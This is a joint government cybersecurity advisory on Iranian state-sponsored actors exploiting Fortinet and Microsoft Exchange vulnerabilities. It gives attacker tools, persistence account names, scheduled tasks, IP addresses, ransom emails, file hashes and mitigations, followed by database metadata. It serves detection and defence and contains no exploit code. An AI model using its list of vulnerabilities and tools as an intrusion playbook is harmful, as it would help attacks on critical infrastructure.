FBI and CISA have observed this Iranian government-sponsored APT group exploit Fortinet vulnerabilities since at least March 2021 and a Microsoft Exchange ProxyShell vulnerability since at least October 2021 to gain initial access to systems in advance of follow-on operations, which include deploying ransomware. ACSC is also aware this APT group has used the same Microsoft Exchange vulnerability in Australia.\n\nThe Iranian government-sponsored APT actors are actively targeting a broad range of victims across multiple U.S. 
critical infrastructure sectors, including the Transportation Sector and the Healthcare and Public Health Sector, as well as Australian organizations. FBI, CISA, ACSC, and NCSC assess the actors are focused on exploiting known vulnerabilities rather than targeting specific sectors. These Iranian government-sponsored APT actors can leverage this access for follow-on operations, such as data exfiltration or encryption, ransomware, and extortion.\n\nThis advisory provides observed tactics and techniques, as well as indicators of compromise (IOCs) that FBI, CISA, ACSC, and NCSC assess are likely associated with this Iranian government-sponsored APT activity.\n\nThe FBI, CISA, ACSC, and NCSC urge critical infrastructure organizations to apply the recommendations listed in the Mitigations section of this advisory to mitigate risk of compromise from Iranian government-sponsored cyber actors.\n\nFor a downloadable copy of IOCs, see AA21-321A.stix.\n\nFor more information on Iranian government-sponsored malicious cyber activity, see [us-cert.cisa.gov/Iran](<https://www.us-cert.cisa.gov/iran>).\n\nClick here for a PDF version of this report.\n\n### Technical Details\n\n### Threat Actor Activity\n\nSince at least March 2021, the FBI and CISA have observed Iranian government-sponsored APT actors leverage Microsoft Exchange and Fortinet vulnerabilities to target a broad range of victims across multiple critical infrastructure sectors in furtherance of malicious activities. Observed activity includes the following.\n\n * In March 2021, the FBI and CISA observed these Iranian government-sponsored APT actors scanning devices on ports 4443, 8443, and 10443 for Fortinet FortiOS vulnerability [CVE-2018-13379](<https://vulners.com/cve/CVE-2018-13379>), and enumerating devices for FortiOS vulnerabilities [CVE-2020-12812](<https://vulners.com/cve/CVE-2020-12812>) and [CVE-2019-5591](<https://vulners.com/cve/CVE-2019-5591>). 
The Iranian Government-sponsored APT actors likely exploited these vulnerabilities to gain access to vulnerable networks. **Note:** for previous FBI and CISA reporting on this activity, refer to Joint Cybersecurity Advisory: [APT Actors Exploit Vulnerabilities to Gain Initial Access for Future Attacks](<https://www.ic3.gov/media/news/2021/210402.pdf>).\n * In May 2021, these Iranian government-sponsored APT actors exploited a Fortigate appliance to access a webserver hosting the domain for a U.S. municipal government. The actors likely created an account with the username `elie` to further enable malicious activity. **Note: **for previous FBI reporting on this activity, refer to [FBI FLASH: APT Actors Exploiting Fortinet Vulnerabilities to Gain Initial Access for Malicious Activity](<https://www.ic3.gov/media/news/2021/210527.pdf>).\n * In June 2021, these APT actors exploited a Fortigate appliance to access environmental control networks associated with a U.S.-based hospital specializing in healthcare for children. The Iranian government-sponsored APT actors likely leveraged a server assigned to IP addresses `91.214.124[.]143` and `162.55.137[.]20`\u2014which FBI and CISA judge are associated with Iranian government cyber activity\u2014to further enable malicious activity against the hospital\u2019s network. 
The APT actors accessed known user accounts at the hospital from IP address `154.16.192[.]70`, which FBI and CISA judge is associated with government of Iran offensive cyber activity.\n * As of October 2021, these APT actors have leveraged a Microsoft Exchange ProxyShell vulnerability\u2014`CVE-2021-34473`\u2014to gain initial access to systems in advance of follow-on operations.\n\nACSC considers that this APT group has also used the same Microsoft Exchange vulnerability ([CVE-2021-34473](<https://vulners.com/cve/CVE-2021-34473>)) in Australia.\n\n### MITRE ATT&CK Tactics and Techniques\n\nFBI, CISA, ACSC, and NCSC assess the following tactics and techniques are associated with this activity.\n\n#### Resource Development [[TA0042](<https://attack.mitre.org/versions/v10/tactics/TA0042>)]\n\nThe APT actors have used the following malicious and legitimate tools [[T1588.001](<https://attack.mitre.org/versions/v10/techniques/T1588/001>), [T1588.002](<https://attack.mitre.org/versions/v10/techniques/T1588/002>)] for a variety of tactics across the enterprise spectrum.\n\n * [Mimikatz](<https://attack.mitre.org/software/S0002>) for credential theft [[TA0006](<https://attack.mitre.org/versions/v10/tactics/TA0042>)]\n * WinPEAS for privilege escalation [[TA0004](<https://attack.mitre.org/versions/v10/tactics/TA0004>)]\n * SharpWMI (Windows Management Instrumentation)\n * WinRAR for archiving collected data [[TA0009](<https://attack.mitre.org/versions/v10/tactics/TA0009>), [T1560.001](<https://attack.mitre.org/versions/v10/techniques/T1560/001>)]\n * FileZilla for transferring files [[TA0010](<https://attack.mitre.org/versions/v10/tactics/TA0010>)]\n\n#### Initial Access [[TA0001](<https://attack.mitre.org/versions/v10/tactics/TA0001/>)]\n\nThe Iranian government-sponsored APT actors gained initial access by exploiting vulnerabilities affecting Microsoft Exchange servers (CVE-2021-34473) and Fortinet devices (CVE-2018-13379, CVE-2020-12812, and CVE-2019-5591) 
[[T1190](<https://attack.mitre.org/versions/v10/techniques/T1190/>)].\n\n#### Execution [[TA0002](<https://attack.mitre.org/versions/v10/tactics/TA0002>)]\n\nThe Iranian government-sponsored APT actors may have made modifications to the Task Scheduler [[T1053.005](<https://attack.mitre.org/versions/v10/techniques/T1053/005>)]. These modifications may display as unrecognized scheduled tasks or actions. Specifically, the below established tasks may be associated with this activity:\n\n * `SynchronizeTimeZone`\n * `GoogleChangeManagement`\n * `MicrosoftOutLookUpdater`\n * `MicrosoftOutLookUpdateSchedule`\n\n#### Persistence [[TA0003](<https://attack.mitre.org/versions/v10/tactics/TA0003>)]\n\nThe Iranian government-sponsored APT actors may have established new user accounts on domain controllers, servers, workstations, and active directories [[T1136.001](<https://attack.mitre.org/versions/v10/techniques/T1136/001>), [T1136.002](<https://attack.mitre.org/versions/v10/techniques/T1136/002>)]. Some of these accounts appear to have been created to look similar to other existing accounts on the network, so specific account names may vary per organization. In addition to unrecognized user accounts or accounts established to masquerade as existing accounts, the following account usernames may be associated with this activity:\n\n * `Support`\n * `Help`\n * `elie`\n * `WADGUtilityAccount`\n\n#### Exfiltration [[TA0010](<https://attack.mitre.org/versions/v10/tactics/TA0010/>)]\n\nThe FBI and CISA observed outbound File Transfer Protocol (FTP) transfers over port 443.\n\n#### Impact [[TA0040](<https://attack.mitre.org/versions/v10/tactics/TA0040>)]\n\nThe APT actors forced BitLocker activation on host networks to encrypt data [T1486]. The corresponding threatening notes were either sent to the victim or left on the victim network as a .txt file. The ransom notes included ransom demands and the following contact information. 
\n\n * sar_addr@protonmail[.]com\n * WeAreHere@secmail[.]pro\n * nosterrmann@mail[.]com\n * nosterrmann@protonmail[.]com \n\n## Detection\n\nThe FBI, CISA, ACSC, and NCSC recommend that organizations using Microsoft Exchange servers and Fortinet investigate potential suspicious activity in their networks. \n\n * Search for IOCs. Collect known-bad IOCs and search for them in network and host artifacts. **Note: **refer to Appendix A for IOCs.\n * Investigate exposed Microsoft Exchange servers (both patched and unpatched) for compromise. \n * Investigate changes to Remote Desktop Protocol (RDP), firewall, and Windows Remote Management (WinRM) configurations that may allow attackers to maintain persistent access. \n * Review domain controllers, servers, workstations, and active directories for new or unrecognized user accounts.\n * Review Task Scheduler for unrecognized scheduled tasks. Additionally, manually review operating-system defined or recognized scheduled tasks for unrecognized \u201cactions\u201d (for example, review the steps each scheduled task is expected to perform).\n * Review antivirus logs for indications they were unexpectedly turned off.\n * Look for WinRAR and FileZilla in unexpected locations. \n\n**Note:** for additional approaches on uncovering malicious cyber activity, see joint advisory [Technical Approaches to Uncovering and Remediating Malicious Activity](<https://us-cert.cisa.gov/sites/default/files/publications/AA20-245A-Joint_CSA-Technical_Approaches_to_Uncovering_Malicious_Activity_508.pdf>), authored by CISA and the cybersecurity authorities of Australia, Canada, New Zealand, and the United Kingdom. \n\n### Mitigations\n\nThe FBI, CISA, ACSC, and NCSC urge network defenders to apply the following mitigations to reduce the risk of compromise by this threat.\n\n#### Patch and Update Systems\n\n * Install updates/patch operating systems, software, and firmware as soon as updates/patches are released. 
\n * Immediately patch software affected by vulnerabilities identified in this advisory: CVE-2021-34473, CVE-2018-13379, CVE-2020-12812, and CVE-2019-5591.\n\n#### Evaluate and Update Blocklists and Allowlists\n\n * Regularly evaluate and update blocklists and allowlists.\n * If FortiOS is not used by your organization, add the key artifact files used by FortiOS to your organization\u2019s execution blocklist. Any attempts to install or run this program and its associated files should be prevented.\n\n#### Implement and Enforce Backup and Restoration Policies and Procedures\n\n * Regularly back up data, air gap, and password protect backup copies offline.\n * Ensure copies of critical data are not accessible for modification or deletion from the system where the data resides. \n * Implement a recovery plan to maintain and retain multiple copies of sensitive or proprietary data and servers in a physically separate, segmented, secure location (e.g., hard drive, storage device, the cloud). \n\n#### Implement Network Segmentation\n\n * Implement network segmentation to restrict adversary\u2019s lateral movement. \n\n#### Secure User Accounts\n\n * Audit user accounts with administrative privileges and configure access controls under the principles of least privilege and separation of duties. \n * Require administrator credentials to install software. \n\n#### Implement Multi-Factor Authentication\n\n * Use multifactor authentication where possible, particularly for webmail, virtual private networks (VPNs), and accounts that access critical systems. \n\n#### Use Strong Passwords\n\n * Require all accounts with password logins to have strong, unique passwords.\n\n#### Secure and Monitor RDP and other Potentially Risky Services\n\n * If you use RDP, restrict it to limit access to resources over internal networks.\n * Disable unused remote access/RDP ports.\n * Monitor remote access/RDP logs. 
\n\n#### Use Antivirus Programs\n\n * Install and regularly update antivirus and anti-malware software on all hosts. \n\n#### Secure Remote Access\n\n * Only use secure networks and avoid using public Wi-Fi networks. \n * Consider installing and using a VPN for remote access.\n\n#### Reduce Risk of Phishing\n\n * Consider adding an email banner to emails received from outside your organization.\n * Disable hyperlinks in received emails.\n\n## Resources\n\n * For more information on Iranian government-sponsored malicious cyber activity, see [us-cert.cisa.gov/Iran](<https://www.us-cert.cisa.gov/iran>). \n * For information and resources on protecting against and responding to ransomware, refer to [StopRansomware.gov](<https://www.cisa.gov/stopransomware/>), a centralized, whole-of-government webpage providing ransomware resources and alerts.\n * The joint advisory [Technical Approaches to Uncovering and Remediating Malicious Activity](<https://us-cert.cisa.gov/sites/default/files/publications/AA20-245A-Joint_CSA-Technical_Approaches_to_Uncovering_Malicious_Activity_508.pdf>) from the cybersecurity authorities of Australia, Canada, New Zealand, the United Kingdom, and the United States provides additional guidance when hunting or investigating a network and common mistakes to avoid in incident handling.\n * CISA offers a range of no-cost [cyber hygiene services](<https://www.cisa.gov/cyber-hygiene-services>) to help critical infrastructure organizations assess, identify, and reduce their exposure to threats, including ransomware. By requesting these services, organizations of any size could find ways to reduce their risk and mitigate attack vectors.\n * The U.S. Department of State\u2019s Rewards for Justice (RFJ) program offers a reward of up to $10 million for reports of foreign government malicious activity against U.S. critical infrastructure. 
See the [RFJ](<https://rewardsforjustice.net/english>) website for more information and how to report information securely.\n * ACSC can provide tailored cyber security advice and assistance, reporting, and incident response support at [cyber.gov.au](<https://www.cyber.gov.au/>) and via 1300 292 371 (1300 CYBER1).\n\n### Appendix A: Indicators of Compromise\n\nIP addresses and executable files are listed below. For a downloadable copy of IOCs, see AA21-321A.stix.\n\n#### IP Addresses\n\n * `91.214.124[.]143`\n * `162.55.137[.]20`\n * `154.16.192[.]70`\n\n#### Executable Files\n\nExecutable files observed in this activity are identified in Table 1.\n\nTable 1: Executable Files\n\n**Filename:** | MicrosoftOutLookUpdater[.]exe \n---|--- \nMD5: | 1444884faed804667d8c2bfa0d63ab13 \nSHA-1: | 95E045446EFB8C9983EBFD85E39B4BE5D92C7A2A \nSHA-256: | c51fe5073bd493c7e8d83365aace3f9911437a0f2ae80042ba01ea46b55d2624 \nSHA-512: | 6451077B99C5F8ECC5C0CA88FE272156296BEB91218B39AE28A086DBA5E7E39813F044F9AF0FEDBB260941B1CD52FA237C098CBF4B2A822F08E3E98E934D0ECF \n**Filename:** | MicrosoftOutlookUpdater.bat \nMD5: | 1A44368EB5BF68688BA4B4357BDC874F \nSHA-1: | FA36FEBFD5A5CA0B3A1B19005B952683A7188A13 \nSHA-256: | 3A08D0CB0FF4D95ED0896F22F4DA8755525C243C457BA6273E08453E0E3AC4C4 \nSHA-512: | 70AA89449EB5DA1D84B70D114EF9D24CB74751CE12D12C783251E51775C89FDCE61B4265B43B1D613114D6A85E9C75927B706F39C576DBB036079C7E8CAF28B2 \n**Filename:** | MicrosoftOutlookUpdater.xml \nMD5: | AA40C49E309959FA04B7E5AC111BB770 \nSHA-1: | F1D90E10E6E3654654E0A677763C9767C913F8F0 \nSHA-256: | 5C818FE43F05F4773AD20E0862280B0D5C66611BB12459A08442F55F148400A6 \nSHA-512: | E55A86159F2E869DCDB64FDC730DA893718E20D65A04071770BD32CAE75FF8C34704BDF9F72EF055A3B362759EDE3682B3883C4D9BCF87013076638664E8078E \n**Filename:** | GoogleChangeManagement.xml \nMD5: | AF2D86042602CBBDCC7F1E8EFA6423F9 \nSHA-1: | CDCD97F946B78831A9B88B0A5CD785288DC603C1 \nSHA-256: | 4C691CCD811B868D1934B4B8E9ED6D5DB85EF35504F85D860E8FD84C547EBF1D 
\nSHA-512: | 6473DAC67B75194DEEAEF37103BBA17936F6C16FFCD2A7345A5A46756996FAD748A97F36F8FD4BE4E1F264ECE313773CC5596099D68E71344D8135F50E5D8971 \n**Filename:** | Connector3.exe \nMD5: | e64064f76e59dea46a0768993697ef2f \n**Filename:** | Audio.exe or frpc.exe \nMD5: | b90f05b5e705e0b0cb47f51b985f84db \nSHA-1: | 5bd0690247dc1e446916800af169270f100d089b \nSHA-256: | 28332bdbfaeb8333dad5ada3c10819a1a015db9106d5e8a74beaaf03797511aa \nVhash: | 017067555d5d15541az28!z \nAuthentihash: | ed463da90504f3adb43ab82044cddab8922ba029511da9ad5a52b8c20bda65ee \nImphash: | 93a138801d9601e4c36e6274c8b9d111 \nSSDEEP: | 98304:MeOuFco2Aate8mjOaFEKC8KZ1F4ANWyJXf/X+g4:MeHFV2AatevjOaDC8KZ1xNWy93U \nNote: | Identical to \u201cfrpc.exe\u201d available at https://github[.]com/fatedier/frp/releases/download/v0.34.3/frp_0.34.3_windows_amd64.zip \n**Filename:** | Frps.exe \nMD5: | 26f330dadcdd717ef575aa5bfcdbe76a \nSHA-1: | c4160aa55d092cf916a98f3b3ee8b940f2755053 \nSHA-256: | d7982ffe09f947e5b4237c9477af73a034114af03968e3c4ce462a029f072a5a \nVhash: | 017057555d6d141az25!z \nAuthentihash: | 40ed1568fef4c5f9d03c370b2b9b06a3d0bd32caca1850f509223b3cee2225ea \nImphash: | 91802a615b3a5c4bcc05bc5f66a5b219 \nSSDEEP: | 196608:/qTLyGAlLrOt8enYfrhkhBnfY0NIPvoOQiE:GLHiLrSfY5voO \nNote: | Identical to \u201cfrps.exe\u201d available at https://github[.]com/fatedier/frp/releases/download/v0.33.0/frp_0.33.0_windows_amd64.zip \n\n### Appendix B: MITRE ATT&CK Tactics and Techniques\n\nTable 2 identifies MITRE ATT&CK tactics and techniques observed in this activity.\n\nTable 2: Observed Tactics and Techniques\n\nTactic | Technique \n---|--- \nResource Development [[TA0042](<https://attack.mitre.org/versions/v10/tactics/TA0042>)] | Obtain Capabilities: Malware [[T1588.001](<https://attack.mitre.org/versions/v10/techniques/T1588/001>)]; Obtain Capabilities: Tool [[T1588.002](<https://attack.mitre.org/versions/v10/techniques/T1588/002>)] \nInitial Access [[TA0001](<https://attack.mitre.org/versions/v10/tactics/TA0001/>)] | Exploit Public-Facing Application [[T1190](<https://attack.mitre.org/versions/v10/techniques/T1190/>)] \nExecution [[TA0002](<https://attack.mitre.org/versions/v10/tactics/TA0002>)] | Scheduled Task/Job: Scheduled Task [[T1053.005](<https://attack.mitre.org/versions/v10/techniques/T1053/005>)] \nPersistence [[TA0003](<https://attack.mitre.org/versions/v10/tactics/TA0003>)] | Create Account: Local Account [[T1136.001](<https://attack.mitre.org/versions/v10/techniques/T1136/001>)]; Create Account: Domain Account [[T1136.002](<https://attack.mitre.org/versions/v10/techniques/T1136/002>)] \nPrivilege Escalation [[TA0004](<https://attack.mitre.org/versions/v10/tactics/TA0004>)] | \nCredential Access [[TA0006](<https://attack.mitre.org/versions/v10/tactics/TA0006>)] | \nCollection [[TA0009](<https://attack.mitre.org/versions/v10/tactics/TA0009>)] | Archive Collected Data: Archive via Utility [[T1560.001](<https://attack.mitre.org/versions/v10/techniques/T1560/001>)] \nExfiltration [[TA0010](<https://attack.mitre.org/versions/v10/tactics/TA0010/>)] | \nImpact [[TA0040](<https://attack.mitre.org/versions/v10/tactics/TA0040>)] | Data Encrypted for Impact [[T1486](<https://attack.mitre.org/versions/v10/techniques/T1486>)] \n\n### Contact Information\n\nTo report suspicious or criminal activity related to information found in this Joint Cybersecurity Advisory, contact your local FBI field office at <https://www.fbi.gov/contact-us/field-offices>, or the FBI\u2019s 24/7 Cyber Watch (CyWatch) at (855) 292-3937 or by e-mail at [CyWatch@fbi.gov](<mailto:CyWatch@fbi.gov>). When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. 
To request incident response resources or technical assistance related to these threats, contact CISA at [Central@cisa.dhs.gov](<mailto:Central@cisa.dhs.gov> \"Email CISA Central\" ). Australian organizations can visit [cyber.gov.au](<https://www.cyber.gov.au/>) or call 1300 292 371 (1300 CYBER 1) to report cybersecurity incidents and access alerts and advisories.\n\n### Revisions\n\n * November 17, 2021: Initial Version\n * November 19, 2021: Added STIX files\n", "published": "2021-11-19T12:00:00", "modified": "2021-11-19T12:00:00", "epss": [{"cve": "CVE-2018-13379", "epss": 0.97257, "percentile": 0.99813, "modified": "2023-12-06"}, {"cve": "CVE-2019-5591", "epss": 0.00234, "percentile": 0.6127, "modified": "2023-12-06"}, {"cve": "CVE-2020-12812", "epss": 0.00555, "percentile": 0.74976, "modified": "2023-12-06"}, {"cve": "CVE-2021-34473", "epss": 0.97344, "percentile": 0.99872, "modified": "2023-12-06"}, {"cve": "CVE-2023-26360", "epss": 0.91394, "percentile": 0.98598, "modified": "2023-11-08"}], "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "baseScore": 10.0}, "severity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, 
"href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa21-321a", "reporter": "Industrial Control Systems Cyber Emergency Response Team", "references": ["https://www.facebook.com/sharer/sharer.php?u=https://www.cisa.gov/news-events/cybersecurity-advisories/aa21-321a&title=Iranian%20Government-Sponsored%20APT%20Cyber%20Actors%20Exploiting%20Microsoft%20Exchange%20and%20Fortinet%20Vulnerabilities%20in%20Furtherance%20of%20Malicious%20Activities", "https://twitter.com/intent/tweet?text=Iranian%20Government-Sponsored%20APT%20Cyber%20Actors%20Exploiting%20Microsoft%20Exchange%20and%20Fortinet%20Vulnerabilities%20in%20Furtherance%20of%20Malicious%20Activities+https://www.cisa.gov/news-events/cybersecurity-advisories/aa21-321a", "https://www.linkedin.com/sharing/share-offsite/?url=https://www.cisa.gov/news-events/cybersecurity-advisories/aa21-321a", "mailto:?subject=Iranian%20Government-Sponsored%20APT%20Cyber%20Actors%20Exploiting%20Microsoft%20Exchange%20and%20Fortinet%20Vulnerabilities%20in%20Furtherance%20of%20Malicious%20Activities&body=https://www.cisa.gov/news-events/cybersecurity-advisories/aa21-321a", "https://us-cert.cisa.gov/ncas/tips/ST05-012", "https://us-cert.cisa.gov/ncas/tips/ST04-002", "https://attack.mitre.org/versions/v9/techniques/enterprise/", "https://www.us-cert.cisa.gov/iran", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13379", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12812", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5591", "https://www.ic3.gov/media/news/2021/210402.pdf", "https://www.ic3.gov/media/news/2021/210527.pdf", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34473", "https://attack.mitre.org/versions/v10/tactics/TA0042", "https://attack.mitre.org/versions/v10/techniques/T1588/001", "https://attack.mitre.org/versions/v10/techniques/T1588/002", "https://attack.mitre.org/software/S0002", "https://attack.mitre.org/versions/v10/tactics/TA0042", 
"https://attack.mitre.org/versions/v10/tactics/TA0004", "https://attack.mitre.org/versions/v10/tactics/TA0009", "https://attack.mitre.org/versions/v10/techniques/T1560/001", "https://attack.mitre.org/versions/v10/tactics/TA0010", "https://attack.mitre.org/versions/v10/tactics/TA0001/", "https://attack.mitre.org/versions/v10/techniques/T1190/", "https://attack.mitre.org/versions/v10/tactics/TA0002", "https://attack.mitre.org/versions/v10/techniques/T1053/005", "https://attack.mitre.org/versions/v10/tactics/TA0003", "https://attack.mitre.org/versions/v10/techniques/T1136/001", "https://attack.mitre.org/versions/v10/techniques/T1136/002", "https://attack.mitre.org/versions/v10/tactics/TA0010/", "https://attack.mitre.org/versions/v10/tactics/TA0040", "https://us-cert.cisa.gov/sites/default/files/publications/AA20-245A-Joint_CSA-Technical_Approaches_to_Uncovering_Malicious_Activity_508.pdf", "https://www.us-cert.cisa.gov/iran", "https://www.cisa.gov/stopransomware/", "https://us-cert.cisa.gov/sites/default/files/publications/AA20-245A-Joint_CSA-Technical_Approaches_to_Uncovering_Malicious_Activity_508.pdf", "https://www.cisa.gov/cyber-hygiene-services", "https://rewardsforjustice.net/english", "https://www.cyber.gov.au/", "https://attack.mitre.org/versions/v10/tactics/TA0042", "https://attack.mitre.org/versions/v10/techniques/T1588/001", "https://attack.mitre.org/versions/v10/techniques/T1588/002", "https://attack.mitre.org/versions/v10/tactics/TA0001/", "https://attack.mitre.org/versions/v10/techniques/T1190/", "https://attack.mitre.org/versions/v10/tactics/TA0002", "https://attack.mitre.org/versions/v10/techniques/T1053/005", "https://attack.mitre.org/versions/v10/tactics/TA0003", "https://attack.mitre.org/versions/v10/techniques/T1136/001", "https://attack.mitre.org/versions/v10/techniques/T1136/002", "https://attack.mitre.org/versions/v10/tactics/TA0004", "https://attack.mitre.org/versions/v10/tactics/TA0042", "https://attack.mitre.org/versions/v10/tactics/TA0009", 
"https://attack.mitre.org/versions/v10/techniques/T1560/001", "https://attack.mitre.org/versions/v10/tactics/TA0010/", "https://attack.mitre.org/versions/v10/tactics/TA0040", "https://attack.mitre.org/versions/v10/techniques/T1486", "https://www.fbi.gov/contact-us/field-offices", "https://www.cyber.gov.au/", "https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://www.cisa.gov/news-events/cybersecurity-advisories/aa21-321a", "https://www.facebook.com/CISA", "https://twitter.com/CISAgov", "https://www.linkedin.com/company/cybersecurity-and-infrastructure-security-agency", "https://www.youtube.com/@cisagov", "https://www.instagram.com/cisagov", "https://www.dhs.gov/performance-financial-reports", "https://www.dhs.gov", "https://www.dhs.gov/foia", "https://www.oig.dhs.gov/", "https://public.govdelivery.com/accounts/USDHSCISA/subscriber/new?topic_id=USDHSCISA_138", "https://www.whitehouse.gov/", "https://www.usa.gov/"], "cvelist": ["CVE-2018-13379", "CVE-2019-5591", "CVE-2020-12812", "CVE-2021-34473", "CVE-2023-26360"], "immutableFields": [], "lastseen": "2023-12-06T15:51:17", "viewCount": 29, "enchantments": {"dependencies": {"references": [{"type": "adobe", "idList": ["APSB23-25"]}, {"type": "attackerkb", "idList": ["AKB:116FDAE6-8C6E-473E-8D39-247560D01C09", "AKB:35B88369-C440-49C0-98FF-C50E258FB32C", "AKB:5DB640DC-B30F-464A-BC81-ED3C15946D65", "AKB:91756851-9B25-4801-B911-E3226A0656B5", "AKB:B54A15A1-8D06-4902-83F9-DC10E40FA81A", "AKB:BDCF4DDE-714E-40C0-B4D9-2B4ECBAD31FF", "AKB:C4CD066B-E590-48F0-96A7-FFFAFC3D23CC", "AKB:CC339C3D-417D-4477-92A7-746AEA51530C", "AKB:FB9BE99D-7DDE-493D-8C9D-12F3DD901458"]}, {"type": "avleonov", "idList": ["AVLEONOV:4E65E4AC928647D5E246B06B953BBC6F", "AVLEONOV:B0F649A99B171AC3032AF71B1DCCFE34"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2018-1187", "CPAI-2021-0476"]}, {"type": "cisa", "idList": ["CISA:24BBE0D109CEB29CF9FC28CEA2AD0CFF", "CISA:8C51810D4AACDCCDBF9D526B4C21660C", 
"CISA:E46D6B22DC3B3F8B062C07BD8EA4CB7C"]}, {"type": "cisa_kev", "idList": ["CISA-KEV-CVE-2018-13379", "CISA-KEV-CVE-2019-5591", "CISA-KEV-CVE-2020-12812", "CISA-KEV-CVE-2021-34473", "CISA-KEV-CVE-2023-26360"]}, {"type": "cve", "idList": ["CVE-2018-13379", "CVE-2019-5591", "CVE-2020-12812", "CVE-2021-31196", "CVE-2021-31206", "CVE-2021-34473", "CVE-2023-26360"]}, {"type": "dsquare", "idList": ["E-691"]}, {"type": "exploitdb", "idList": ["EDB-ID:47287", "EDB-ID:47288"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:6EF33E509C6C5002F8E81022F84C01B5", "EXPLOITPACK:E222442D181419B052AACE6DA4BC8485"]}, {"type": "fireeye", "idList": ["FIREEYE:FC60CAB5C936FF70E94A7C9307805695"]}, {"type": "fortinet", "idList": ["FG-IR-18-384", "FG-IR-19-037", "FG-IR-19-283", "FG-IR-20-233"]}, {"type": "githubexploit", "idList": ["0A015784-48D7-5DC1-9FB9-416A9BBEA6D5", "2BEFA353-947D-5B41-AE38-EDB0C71B5B44", "2D0AC1C7-F656-5D6B-9FC2-79525014BE1E", "3DF3AA17-94C8-5E17-BCB8-F806D1746CDF", "4AC49DB9-A784-561B-BF92-94209310B51B", "B3DDE0DD-F0B0-542D-8154-F61DCD2E49D9", "E458F533-4B97-51A1-897B-1AF58218F2BF", "F00E8BE4-12D2-5F5B-A9AA-D627780259FB", "F14BCE6F-3415-59C7-AC9D-A5D7ABE1BB8E"]}, {"type": "hivepro", "idList": ["HIVEPRO:09525E3475AC1C5F429611A90182E82F", "HIVEPRO:10B372979ED5F121D7A84FB66487023E", "HIVEPRO:1825C4046C6054693C41D7D5DFD7BA10", "HIVEPRO:186D6EE394314F861D57F4243E31E975", "HIVEPRO:92FF0246065B21E79C7D8C800F2DED76", "HIVEPRO:B772F2F7B4C9AE8452D1197E2E240204", "HIVEPRO:C0B03D521C5882F1BE07ECF1550A5F74", "HIVEPRO:DB06BB609FE1B4E7C95CDC5CB2A38B28", "HIVEPRO:E7F36EC1E4DCF018F94ECD22747B7093", "HIVEPRO:F2305684A25C735549865536AA4254BF", "HIVEPRO:FD730BCAD086DD8C995242D13B38EBC8"]}, {"type": "ics", "idList": ["AA18-284A", "AA18-337A", "AA19-024A", "AA19-122A", "AA19-168A", "AA19-290A", "AA19-339A", "AA20-006A", "AA20-010A", "AA20-014A", "AA20-020A", "AA20-031A", "AA20-049A", "AA20-073A", "AA20-099A", "AA20-106A", "AA20-107A", "AA20-120A", "AA20-126A", "AA20-133A", "AA20-182A", 
"AA20-183A", "AA20-195A", "AA20-198A", "AA20-205A", "AA20-206A", "AA20-209A", "AA20-225A", "AA20-227A", "AA20-239A", "AA20-245A", "AA20-258A", "AA20-259A", "AA20-266A", "AA20-275A", "AA20-280A", "AA20-283A", "AA20-296A", "AA20-296B", "AA20-301A", "AA20-302A", "AA20-304A", "AA20-336A", "AA20-345A", "AA20-352A", "AA21-0000A", "AA21-008A", "AA21-042A", "AA21-048A", "AA21-055A", "AA21-062A", "AA21-076A", "AA21-077A", "AA21-110A", "AA21-116A", "AA21-131A", "AA21-148A", "AA21-200A", "AA21-200B", "AA21-201A", "AA21-209A", "AA21-229A", "AA21-243A", "AA21-259A", "AA21-287A", "AA21-291A", "AA21-336A", "AA21-356A", "AA22-011A", "AA22-040A", "AA22-047A", "AA22-054A", "AA22-055A", "AA22-057A", "AA22-074A", "AA22-076A", "AA22-083A", "AA22-103A", "AA22-108A", "AA22-110A", "AA22-117A", "AA22-131A", "AA22-137A", "AA22-138A", "AA22-138B", "AA22-152A", "AA22-158A", "AA22-174A", "AA22-181A", "AA22-187A", "AA22-216A", "AA22-223A", "AA22-228A", "AA22-249A", "AA22-249A-0", "AA22-257A", "AA22-264A", "AA22-265A", "AA22-277A", "AA22-279A", "AA22-294A", "AA22-320A", "AA22-321A", "AA22-335A", "AA23-025A", "AA23-039A", "AA23-040A", "AA23-059A", "AA23-061A", "AA23-074A", "AA23-075A", "AA23-108", "AA23-129A", "AA23-131A", "AA23-136A", "AA23-144A", "AA23-158A", "AA23-165A", "AA23-187A", "AA23-193A", "AA23-201A", "AA23-208A", "AA23-213A", "AA23-215A", "AA23-242A", "AA23-250A", "AA23-263A", "AA23-270A", "AA23-278A", "AA23-284A", "AA23-289A", "AA23-319A", "AA23-320A", "AA23-325A", "AA23-335A", "AA23-339A"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:2303181B17E64D6C752ACD64C5A2B39C", "IMPERVABLOG:6CF60AA98AC32EEEED1A25871823E90D"]}, {"type": "kaspersky", "idList": ["KLA12224"]}, {"type": "kitploit", "idList": ["KITPLOIT:965198862441671998"]}, {"type": "krebs", "idList": ["KREBS:831FD0B726B800B2995A68BA50BD8BE3"]}, {"type": "malwarebytes", 